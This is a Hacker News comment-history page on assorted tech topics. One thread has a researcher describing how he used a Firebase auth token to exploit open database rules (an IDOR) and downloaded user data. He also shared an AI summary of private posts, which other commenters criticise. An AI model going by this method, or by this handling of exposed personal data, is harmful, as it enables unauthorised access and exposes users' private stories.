Hacker Newsnew | past | comments | ask | show | jobs | submit | jc4p's commentslogin

I do a lot of AI work and right now the story for doing LLMs on iOS is very painful (but doing Whisper or etc is pretty nice) so this is existing and the API looks Swift native and great, I can't wait to use it!

Question/feature request: Is it possible to bring my own CoreML models over and use them? I honestly end up bundling llama.cpp and doing gguf right now because I can't figure out the setup for using CoreML models, would love for all of that to be abstracted away for me :)


That’s a good suggestion, and it indeed sounds like something we’d want to support. Could you help us better understand your use case? For example, where do you usually get the models (e.g., Hugging Face)? Do you fine-tune them? Do you mostly care about LLMs (since you only mentioned llama.cpp)?


Thank you! I’ve been fine tuning tiny Llama and Gemma models using transformers then exporting from the safetensors that spits out — My main use case is LLMs but I’ve also tried getting YOLO finetuned and other PyTorch models running and ran into similar problems, just seemed very confusing to figure out how to properly use the phone for this.


Thanks for sharing the details—that makes a lot of sense. Fine-tuning and exporting models on-device can be tedious nowadays. We’re planning to look into supporting popular on-device LLM models more directly, so deployment feels much easier. We'll let you know here or reach out to you once we have something


Hi all, i'm the security researcher mentioned in the article -- just to be clear:

1. The leak Friday was from firebase's file storage service

2. This one is about their firebase database service also being open (up until Saturday morning)

The tl;dr is:

1. App signed up using Firebase Auth

2. App traded Firebase Auth token to API for API token

3. API talked to Firebase DB

The issue is you could just take the Firebase Auth key, talk to Firebase directly, and they had the read/write/update/delete permissions open to all users so it opened up an IDOR exploit.

I pulled the data Friday night to have evidence to prove the information wasn't old like the previous leak and immediately reached out to 404media.

Here is a gist of Gemini 2.5 Pro summarizing 10k random posts: https://gist.github.com/jc4p/7c8ce9a7392f2cbc227f9c6a4096111...

And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.

If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56

And here's the output of that script (any db that has <100 rows is something another "hacker" wrote to and deleted from): https://gist.github.com/jc4p/bc35138a120715b92a1925f54a9d8bb...


Doesn't that Gemini summary gist tie usernames to pretty specific highly personal non-public stories? That seems like a significant violation of ethical hacking principles.


They're anonymous usernames the app had them make and they were told don't use anything shared elsewhere and I googled and there's not any uniquely identifiable people from any of them.

They seem generic enough that I think it's okay, but you're right there is no need in including them and I should've caught that in the AI output, thank you!!


I think including specific stories is already an ethical hacking violation.

Including the pseudonyms associated with those stories creates unnecessary risk of, and arguably incentive for those individuals.

I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer" but then exposed part of that data to generate an AI summary.

Having the file on your computer is questionable enough but not treating it as something private to be professionally protected is IMHO another ethical violation.


I don't see the need for the AI output to begin with. Normally pen-testers just demonstrate breaches, this is more like exposing what users do on the app.


Are you concerned about potential CFAA issues?


Yes! haha! But hopefully I have a good enough support group and connections that I'll be ok if that happens, I just really wanted to prove that they were not being honest when they said it was data prior to 2024.


Computer Fraud and Abuse Act - "CFAA"


i've been trying to keep up with this field (image generation) so here's quick notes I took:

Claude's Summary: "Normalizing flows aren't dead, they just needed modern techniques"

My Summary: "Transformers aren't just for text"

1. SOTA model for likelihood on ImageNet 64×64, first ever sub 3.2 (Bits Per Dimension) prev was 2.99 by a hybrid diffusion model

2. Autoregressive (transformers) approach, right now diffusion is the most popular in this space (it's much faster but a diff approach)

tl;dr of autoregressive vs diffusion (there's also other approaches)

Autoregression: step based, generate a little then more then more

Diffusion: generate a lot of noise then try to clean it up

The diffusion approach that is the baseline for sota is Flow Matching from Meta: https://arxiv.org/abs/2210.02747 -- lots of fun reading material if you throw both of these into an LLM and ask it to summarize the approaches!


You have a few minor errors and I hope I can help out.

  > Diffusion: generate a lot of noise then try to clean it up
You could say this about Flows too. The history of them is shared with diffusion and goes back to the Whitening Transform. Flows work by a coordinate transform so we have an isomorphism where diffusion works through, for easier understanding, a hierarchical mixture of gaussians. Which is a lossy process (more confusing when we get into latent diffusion models, which are the primary type used). The goal of a Normalizing Flow is to turn your sampling distribution, which you don't have an explicit representation of, into a probability distribution (typically Normal Noise/Gaussian). So in effect, there are a lot of similarities here. I'd highly suggest learning about Flows if you want to better understand Diffusion Models.

  > The diffusion approach that is the baseline for sota is Flow Matching from Meta
To be clear, Flow Matching is a Normalizing Flow. Specifically, it is a Continuous and Conditional Normalizing Flow. If you want to get into the nitty gritty, Ricky has a really good tutorial on the stuff[0]

[0] https://arxiv.org/abs/2412.06264


thank you so much!!! i should’ve put that final sentence in my post!


Happy to help and if you have any questions just ask, this is my jam


Hi! I have a WIP of this over at https://talktrainer.app/ -- I just added Dutch to it.

It uses OpenAI's realtime API to simulate either a tutoring session (the speaker will revert to English to help you) or a first date or business meeting (the speaker will always speak the target language)

You can see the AI's transcriptions but not your own, limitation of the current OpenAI API but definitely something I can fix.

The prompts are like this: https://gist.github.com/jc4p/d8b9d121425ec191d62602d8720eeed... and the rest of it is a Nextjs app wrapped around the WebRTC connection.

I'm not fully in love with the app so I'd love any feedback or hearing if it works well for you -- It doesn't have a lot of features yet (including saving context) and if you bump into the time limit just open it up in incognito to keep going.


This is great! Maybe some more tourist-related scenarios, like "ordering at restaurant", "resolving dispute about rental car crash" etc? :-)

The "next level" feature would be to get it to speak even simpler, with some hints about how to reply, for the beginners. I don't know how that would ideally look, but maybe a button to pop up some "key words" or phrases that one could use? (Even so, I found myself using the little I know, so it's obviously somehow working even though my knowledge is extremely basic.)

This is one of the places where I feel LLM's can do something good for the world, giving a safe playground for getting experience with speaking new languages without the anxiety of performing badly in front of other people – and hopefully make it easier to connect with real people in that language later.


This is really impressive! Great job.

One small piece of feedback… There were a couple times where I asked to learn something, and it asked me to repeat a phrase back, which was great. But when I repeated it back, I know I didn’t quite nail it (eg perhaps said “un” instead of “una”) and rather than correcting me, it actually told me I did it perfectly. Maybe there’s some tuning with the prompts that may help turn down the natural sycophancy of the model and make sure it’s a little more strict.

Keep up the great work!


One modification I would suggest is to add a bit more to the initial prompt like:

"write as if you are a person from {{REGION}}. Modify your language to proficiency level {{PROFICIENCY_LEVEL}}"

that way I could for example, speak as if it's someone using Mexican Spanish vs Madrid Spanish vs Chilean Spanish, etc.

Secondly, you could include the user's speech transcribed as part of the conversation window


Amazing idea, do you think this should be a freeform text field the user can enter to add their own prompts to or should it be a checkbox/select on the homepage so the user can pick from a limited set?


I think a drop down when you first choose the language, and it can be optional. You can test it with a few languages at first, to see how it is.


Bit of feedback:

I've learned Japanese a while back but haven't practised in a long time.

1. it would be awesome if this could transcript what I just said in japanese to be sure that it got me

2. I don't know kanjis that well, so reading is hard, having a button to have the AI repeat the sentence would be quite useful.

Other than that, I could definitely use something like that for practice


Did you just add Dutch as per the submitter’s request or was it part of your plan prior?

Curious because I’m trying to learn Romanian, and since it’s a less common language there are fewer resources available. So I wasn’t sure if you added Dutch with minimal amount of effort following the poster’s request.

That said, I gave your app a try with Spanish and it looks pretty good! But I didn’t see a Help page to clarify how I’m “supposed” to interact. Eg I tried saying in English “I don’t understand” (even though I know how to say that in Spanish) and it responded in Spanish which may be hard for absolute beginners. Although full immersion is much better way to learn.

I can try playing around more with it to give you some feedback.


> Eg I tried saying in English “I don’t understand” (even though I know how to say that in Spanish) and it responded in Spanish which may be hard for absolute beginners.

I tried to use ChatGPT as a "live" translator with my in laws and I noticed it is extremely bad at language "consistency" or at understanding your intent when it comes to multiple languages.

It will sometimes respond in English when you talk to it in the foreign language, it will sometimes assume that a clear instruction like "repeat the last sentence" needs to be translated, etc.

I don't know how the person above is approaching the problem but your experience is consistent with mine and I don't think GenAI models (at least OpenAI ones) are suitable for the task.


I just added Romanian for you -- here's the entire diff for adding a new language (as long as it's in OpenAI's training data) -- https://images.kasra.codes/romanian_diff.png

Please let me know if it works, and I'll definitely work on adding in instructions for the expected interactivity, thank you!


I'm a native Dutch speaker and tried this out for a bit. It works impressively well although it might be challenging for complete beginners. Maybe you can add an option for the trainer to use more simple language for beginners?

I tried practicing some verb conjugations. The trainer displayed some fill-in-the-blank sentences like "she ... home after class", asking me to conjugate "to walk" in that sentence. However, the audio actually pronounced the full sentence "she walks home after class", giving away the answer.


Just tried this for Spanish and it works incredibly well. I have been hacking on something similar for translation (it's really quite easy too, just a few prompts), but I was using Google Translate's interface for vocalizing! This is seriously good stuff, really nice work putting it together.

I will probably use something like this for language practice.


I just tried it and it works perfectly. The color scheme and font size could be touched up to look better. Just out of curiosity, is $10/month enough to cover the (unlimited) API cost? Do you estimate how many percentage of your users will use more than $10 API fee each month?


Thanks so much for trying it out! The realtime API is actually very cheap especially for short connections, for each user who uses it 30 minutes a day every day in a month it costs me ~$5 and I assume the average user is going to use it way less than that (although i have 0 users right now haha)


Please add Mandarin Chinese! :) would love to try this


This is great! Well done.

I've used the realtime API for something similar (also related to practicing speaking, though not for foreign languages). I just wanted to comment that the realtime API will definitely give you the user's transcriptions -- they come back as an `server.conversation.item.input_audio_transcription.completed` event. I use it in my app for exactly that purpose.


Thank you so much!! While the transcription is technically in the API it's not a native part of the model and runs through Whisper separately, in my testing with it I often end up with a transcription that's a different language than what the user is speaking and the current API has no way to force a language on the internal Whisper call.

If the language is correct, a lot of the times the exact text isn't 100% accurate, if that's 100% accurate, it comes in slower than the audio output and not in real time. All in all not what I would consider feature ready to release in my app.

What I've been thinking about is switching to a full audio in --> transcribe --> send to LLM --> TTS pipeline, in which case I would be able to show the exact input to the model, but that's way more work than just one single OpenAI API call.


Heyo, I work on the realtime api, this is a very cool app!

With transcription I would recommend trying out "gpt-4o-transcribe" or "gpt-4o-mini-transcribe" models, which will be more accurate than "whisper-1". On any model you can set the language parameter, see docs here: https://platform.openai.com/docs/api-reference/realtime-clie.... This doesn't guarantee ordering relative to the rest of the response, but the idea is to optimize for conversational-feeling latency. Hope this is helpful.


Ah yes, I've seen that occasionally too, but it hasn't been a big enough issue for me to block adoption in a non-productized tool.

I actually implemented the STT -> LLM -> TTS pipeline, too, and I allow users to switch between them. It's far less interactive, but it also gives much higher quality responses.

Best of luck!


This is super cool (i do a LOT of react native after years of doing native development) -- one thing I'd love: Adding easy upgrades, right now if I leave a RN app for a while getting it to compile on latest iOS/Android again requires a lot of manual labor and reviewing rn-diff-purge. Good luck on the project!


Autodesk bought EAGLE in 2016, so just about ten years between acquisition and discontinuation.

EAGLE is the first PCB design app I learned (and had a harder onramp than React) so this is sad, but it is important to note that most hobbyists have already switched over to KiCad: https://www.kicad.org/


Even professionally, some of the places I worked for lately preferred KiCAD because you can check in libraries and projects to git and see meaningful diffs.


Altium sure does leave a lot to be desired in that respect with its large binary files.


And many other areas. I really enjoyed how they removed some features I used from their cloud offering and then made it a paid upgrade.


I am not sure if you realize that Eagle is fully embedded and rebranded within Fusion360 so you will have access to the same functionality but in integrated environment (for better or worse)


Speaking as a subscriber to Fusion: Do-it-all software is nearly always inferior to special purpose software. I don't use the built-in Eagle functionality in Fusion even though I've paid for it.


Yeah, I have no love for Autodesk as a begrudging Fusion360 user, but on the surface it seems that 10 years before sunsetting an acquired product as well as integrating it into an existing platform in that same timeframe is pretty good as far as a product acquisition goes from an end user perspective.


Yeah, on paper it looks an acceptable strategy. Unfortunately it looks like they botched execution.


2016 was not 10y ago tho.


EOL is 2026, so ten years.


Surprised it lasted that long. This reminds me of when they bought out Softimage in 2009 because XSI might have grown into something that challenges Maya, then released the last version in 2014 after delivering five years of barely any new features.


Let me guess, they gave it half-baked support for FBX files?


It's anecdotal, but I just recently started getting into more hardware-oriented stuff and found that KiCad came recommended for PCB design/etc. I found it to be pretty useful, but I'm too much of a novice to really give it a fair shake.


My advice to new kicad users is just to watch someone on YouTube go through a familiar project and see how their flow is, then try to create your own project from design to implementation. Next, check out the kicad library guidelines to see what it takes to create a library part so you can get everything right. Lastly, open up the shortcuts screen so you can see what key does what, you’ll get the most common ones quickly and the others you can see when you are going through menus.


Also used EAGLE first briefly for hobbyist work, right after it got acquired, but my team switched to Altium soon that seemed maybe too powerful for my sake. I used KiCad afterwards and it works on Mac like EAGLE did.


love running into old friends on HN, so some very stale info from someone who hasn’t worked at SO in many years: while the job board was differentiated and nice from the programmers side, it’s really difficult to convince recruiters to use a new system with new rules. most (not all ofc) just want to spray and pray.

as a job seeker being told “you’re gonna have the upper hand here” is amazing, as a recruiter it makes it very difficult to sell to unless you really own the market.


Why would they offer him a job right before saying that? Some of it could be true, absolutely, but it seems more emotionally manipulative than anything else, to me. The CEO was mad so he said something.


> Why would they offer him a job right before saying that?

A few people have mentioned that on this thread, but I don't think it's in sync with the reality of how incredibly hard it is to hire technical talent right now, esp talent that knows your systems well.

It's entirely possible for someone to be the most demanding intern a co has ever had and still be a great hire; hell, it might even be _correlated_. Interns usually haven't figured out workplace norms yet, and combining that with being smart and driven could easily yield good-faith behavior that nevertheless is "demanding" (for example, asking lots of questions about tasks he's given, asking for guidance with parts of the system he's not working on, etc etc). In that case, I would absolutely want to hire that intern, with the understanding that he'd need to get better at the cultural aspects of the job once he joined full-time (as all intern conversions do).

That being said, no question that it was a bizarre and immature thing for the CEO to bring up, and I don't disagree with your characterization of it as "emotionally manipulative".


I'm looking at this from the perspective of "is the emotion/frustration felt by the CEO valid". In other words, did this open source author actually do ANYTHING which could cause frustration in a previous employer. An important part of that is whether they were actually a 50% pain in the ass employee who repeatedly was pushy (but still perhaps is hireable because they were net positive)

I'm disregarding any commentary on actual action taken by the CEO, because as I said I think it's incredibly stupid and immature.

This reply below by @treis is a good explanation of how i feel about the answer to your question.

> Lots of CEOs/Owners will definitely be salty about that. And they're not totally wrong to feel that way. You pay someone a bunch of money only to watch them walk and help your competitor take your market share. It's understandable why that's upsetting. But they should have the maturity to understand that's how the world works and not throw a tantrum.


This wikipedia list is missing a lot of APIs, it seems more related to products -- For example, the QPX API (which I used) was shut down this April and is nowhere in that list. Your numbers are lower than they should be.


I'm pretty sure the qpx API was a purchase, not something Google started. So it's arguable that you can categorize it the same way.


I'm pretty sure shutting down critical parts of acquired products is a major part of the problem.


agreed. Just because they were acquired doesn’t mean that the acquisition customers didn’t feel the pain from being forced deprecated


Notable there would be the recent incident where Twitter bought some ML startup for abuse analysis and shut down customers overnight with almost no warning.


The framework being advertised as a minimal lightweight framework and having its size compared to the biggest frameworks is a bit off-putting to me.

I get that they wouldn't want to advertise their competitors, but the comparison matrix on the page makes mini.css seem tiny, where as a google search shows it's the biggest popular framework like this.

Mini.css is 7KB gzipped, Milligram[0] (the first google result I see for "minimalist css framework", mini.css is second) is 2KB gzipped. Pure.css[1] (the third result) is 3.8KB gzipped.

[0] - https://milligram.github.io/ [1] - https://purecss.io/


Such a pity you didn't include my own, Picnic CSS[2]. One of the main features is Lightweight (7kb min+gzip, same as mini), and it is also popular (2177 stars). It focuses on beautiful and cohesive components out of the box:

[2] https://picnicss.com/


Sorry I was mostly going off the google results. Your library looks really nice, the SCSS variable changing is awesome!


Thanks! It's a pity that the SCSS is basically undocumented, as I use it in most projects and it has really awesome features that only I know. But the time sink would be tremendous and I'm focusing on another project right now.


Pedantic. Wondering why you used 'its a pity' twice. I want to believe it was pure luck, but otherwise it sounds snarky.


I guess it's a translation issue, no need to insult me. The tone was intended to be totally different, the first one like "hey take a look at this" and the second one more like "I wish I could have done it" (and because of the different feeling I didn't realize I had already written the same expression before).


I have a list on a (largely unfinished) site I'm working on here: https://www.lightentheweb.com/libraries/


Nice, while you are at it I also have a production-ready JS library https://umbrellajs.com/ and an experimental and not so browser-compatible one https://superdom.site/ in case you are interested.

BTW I cannot seem to see the people behind it, the "About" only says "This website was made by people. In the interests of inclusivity, we're aiming to get some robots to contribute soon."


Seems a bit lame to complain that someone chooses to not reveal who they are.

Frankly, I think you need to be less aggressive shilling your own projects in a "competitor's" submission. ctrl-f for your own username. It's a bit much.


But I wasn't complaining at all! I was just curious about who was behind it so pointing it out just in case it was an error in the code or in my browser.

And sure, I am passionate about minimal programming so I've done quite a few projects and point them out as relevant examples. Though I agree I got a bit carried away (3 comment threads with external links) in this thread, my apologies (cannot change it now). See my submission history ( https://news.ycombinator.com/threads?id=franciscop ) for a full picture, I don't link to my projects nearly as much as I did in here and I'll just comment relevant info without so many external links in the future.


Ah it's fine, I really didn't mean to not have my name on the site anyway, I just didn't get around to adding it. I'll do that soon!


Ah, thank you, I will add those.

About the "about" page, the site is quite unfinished :( I want to add more information, examples and resources, but have fallen behind. I hope to fix that quite soon.

Thank you for your contribution!


I love Picnic; thank you for your contribution.


Also a lot of the frameworks compared against are totally modular, so comparing against the full framework size doesn't really mean a lot, because it almost never makes sense to include every framework module.

E.g. in Bootstrap 3 if you only want typography, it's 9kb min/2.8kb gz, for typography+forms+buttons it's 27kb min/5.kb gz, for all 'common CSS' (incl grid + responsive utilities) it's 46kb min/8.8kb gz.

The comparison size of 20kb gz is only if you pulled in every additional component available.


Both of those are gorgeous. Mini.css, not so much. I mean, Mini is fine...better than I could do. But, when I visit, I feel neutral about it. I can't imagine it improving my projects just by including it. And, the example of Mini customization (http://codepen.io/chalarangelo/pen/YNKYgz) is downright ugly.

I use CSS frameworks (mostly Bootstrap) because I suck at design. I need a hand up, and a good framework provides it. Customization is necessary, but not all that's necessary.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: